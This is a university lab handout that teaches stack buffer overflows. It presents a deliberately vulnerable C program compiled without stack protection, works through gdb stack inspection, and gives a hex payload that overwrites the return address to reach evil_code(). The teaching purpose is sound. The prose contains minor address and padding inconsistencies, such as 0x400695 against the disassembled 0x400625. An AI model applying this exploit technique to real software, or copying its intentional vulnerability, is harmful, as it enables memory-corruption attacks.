Buffer Overflow Exploit

Here’s an example of exploiting a buffer overflow bug to cause a function to return to another function of our choosing.

Download and extract the bufexploit.tar.

cd cs224
wget https://cs224.cs.vassar.edu/labs/bufexploit.tar
tar xvf bufexploit.tar
cd bufexploit

In this directory you’ll find several files:

To get startedl let’s look at bufexploit.c

#include <stdio.h>
#include <stdlib.h>

/* Compile with:
   gcc -Og -no-pie -fno-stack-protector -o bufexploit bufexploit.c
*/

char *gets(char *s){
  int c = getchar();
  char *p = s;
  while (c != EOF && c != '\n')
    {
      *p++ = c;
      c = getchar();
    }
  *p = '\0';
  return s;
}

void evil_code(void) {
  printf("You have been pwned!\n");
  exit(0);
}


void get_input(void) {
  char buf[20]; /* Way too small!!! */
  gets(buf);
  return;
}

void main(void) {
  printf("Type a string:\n");
  get_input();
  printf("Function returned normally\n");
}

Your job is to overflow the buffer in the call to get_input() to get this function to return to evil_code() instead of returning normally.

Let’s look at the disassembly of the get_input() function.

objdump -d bufexploit > bufexploit.s
000000000040063f <get_input>:
  40063f:   48 83 ec 28             sub    $0x28,%rsp
  400643:   48 89 e7                mov    %rsp,%rdi
  400646:   e8 8c ff ff ff          callq  4005d7 <gets>
  40064b:   48 83 c4 28             add    $0x28,%rsp
  40064f:   c3                      retq   

We know that at the start of the function call, %rsp points to the return address of the calling function.

The first line of the code, sub $0x28,%rsp allocates 40 bytes (0x28 is 40 in decimal) for the stack frame. Our stack frame looks like this now (each box holds 8 bytes in the diagram):

+------------------+
|  Return Address  |
+------------------+
|                  |
+------------------+
|                  |
+------------------+
|                  |
+------------------+
|                  |
+------------------+
|                  | <-- %rsp
+------------------+

The code then copies %rsp to %rdi before the call to gets(). The argument to gets() is the buffer where input from the user is stored, so we know that input from the user will be placed at the memory address contained in %rsp.

Let’s run the program under the debugger with a small input of hex numbers. To do this we’ll create a text file exploit.txt that looks like the following:

00 01 02 03 04 05 06 07  /* this is a comment */
11 11 11 11 11 11 11 11  /* 8 bytes per line  */
22 22 22 22 22 22 22 22	
33 33 33 33 33 33 33 33

I’ve given each byte a different value so we can easily see where each byte ends up on the stack.

To convert the text file above into an ascii string suitable for input to the program, we use the hex2raw program as follows:

./hex2raw -i exploit.txt > out.raw

The file out.raw is what we’ll use to pass in our input string to the bufexploit program:

./bufexploit < out.raw
Type a string:
Function returned normally

The function returned normally. Why? We did overflow the buffer (the buffer is an array of 20 characters and we gave 33 characters, 32 input characters plus the NUL terminating character), but we didn’t overflow it enough to corrupt the return address stored on the stack. Let’s look at the program in gdb:

gdb -tui bufexploit

We are now inside gdb. Let’s put gdb in view assembly mode, set a breakpoint at get_input and run the program.

(gdb) b get_input
Breakpoint 1 at 0x40063f
(gdb) run < out.raw
Starting program: /home/jawaterman/classes/cmpu-224/Code_Examples/Attacklab/bufexploit/bufexploit < out.raw
Type a string:
Breakpoint 1, 0x000000000040063f in getInput ()
(gdb) layout asm
(gdb)

Let’s move to the line right after the call to gets:

(gdb) ni
0x0000000000400643 in getInput ()
(gdb) ni
0x0000000000400646 in getInput ()
(gdb) ni
0x000000000040064b in getInput ()
(gdb)

Now let’s examine the stack using the gdb examine memory (x) command. The format examine memory is as follows:

(gdb) help x
Examine memory: x/FMT ADDRESS.
ADDRESS is an expression for the memory address to examine.
FMT is a repeat count followed by a format letter and a size letter.
Format letters are o(octal), x(hex), d(decimal), u(unsigned decimal),
  t(binary), f(float), a(address), i(instruction), c(char), s(string)
  and z(hex, zero padded on the left).
Size letters are b(byte), h(halfword), w(word), g(giant, 8 bytes).

The ADDRESS is the location in memory we want to examine. We will want to examine the address stored in %rsp (but remember in gdb registers are specified with the $ sign, so we’ll use $rsp).

So we want to examine 48 bytes in hexadecimal we use the following:

(gdb) x/48bx $rsp
0x7fffffffe050: 0x00    0x01    0x02    0x03    0x04    0x05    0x06    0x07
0x7fffffffe058: 0x11    0x11    0x11    0x11    0x11    0x11    0x11    0x11
0x7fffffffe060: 0x22    0x22    0x22    0x22    0x22    0x22    0x22    0x22
0x7fffffffe068: 0x33    0x33    0x33    0x33    0x33    0x33    0x33    0x33
0x7fffffffe070: 0x00    0xe1    0xff    0xff    0xff    0x7f    0x00    0x00
0x7fffffffe078: 0x65    0x06    0x40    0x00    0x00    0x00    0x00    0x00

You can see where our input when on the stack. gdb prints memory increasing as we go down, so we have to look a the output from the bottom up to see how it maps to our stack. It looks like the following:

+-------------------------+
| 00 00 00 00 00 40 06 65 |  <-- Return address
+-------------------------+
| 00 00 7f ff ff ff e1 00 |
+-------------------------+
| 33 33 33 33 33 33 33 33 |
+-------------------------+
| 22 22 22 22 22 22 22 22 |
+-------------------------+
| 11 11 11 11 11 11 11 11 |
+-------------------------+
| 07 06 05 04 03 02 01 00 |
+-------------------------+
   <--- Increasing Memory

Note the address 0x400665 is the address for the regular function return. It is this address that we want to overwrite. From this diagram it is clear that we need 8 more bytes of padding followed by the address of the start of the evil_code function. We can look at the bufexploit.s file we created earlier to find this address:

0000000000400625 <evil_code>:
  400625:   48 83 ec 08             sub    $0x8,%rsp
  400629:   48 8d 3d d4 00 00 00    lea    0xd4(%rip),%rdi        # 400704 <_IO_stdin_used+0x4>
  400630:   e8 8b fe ff ff          callq  4004c0 <puts@plt>
  400635:   bf 00 00 00 00          mov    $0x0,%edi
  40063a:   e8 a1 fe ff ff          callq  4004e0 <exit@plt>

From this we can see the start of evil code is at address 0x400695. Let’s update our exploit.txt file to overwrite the return address with this new address of our evil function.:

00 01 02 03 04 05 06 07  /* padding */
10 11 12 13 14 15 16 17  /* padding */
20 21 22 23 24 25 26 27  /* padding */
30 31 32 33 34 35 36 37  /* padding */
40 41 42 43 44 45 46 47  /* padding */
25 06 40 00 00 00 00 00  /* address of evil_code */

Note that the address is in little endian format, so we read the address from right to left.

Use hex2raw to create a new out.raw file and run your program:

./bufexploit < out.raw
Type a string:
You have been pwned!

This binary has now been successfully attacked.

Making Your Own Exploit

No it’s your turn to give it a try. Using what you have learned so far as a guide, your job is to come up with an exploit for the my_exploit binary.

Write an exploit file that, when converted by hex2raw) and given as an input to my_exploit, causes the binary to return to the function your_code() which prints out the message “Hey, how did we get here?”.

Submitting your work

Upload upload to Gradescope, my_exploit.txt, the exploit file you used to hijack the my_exploit binary.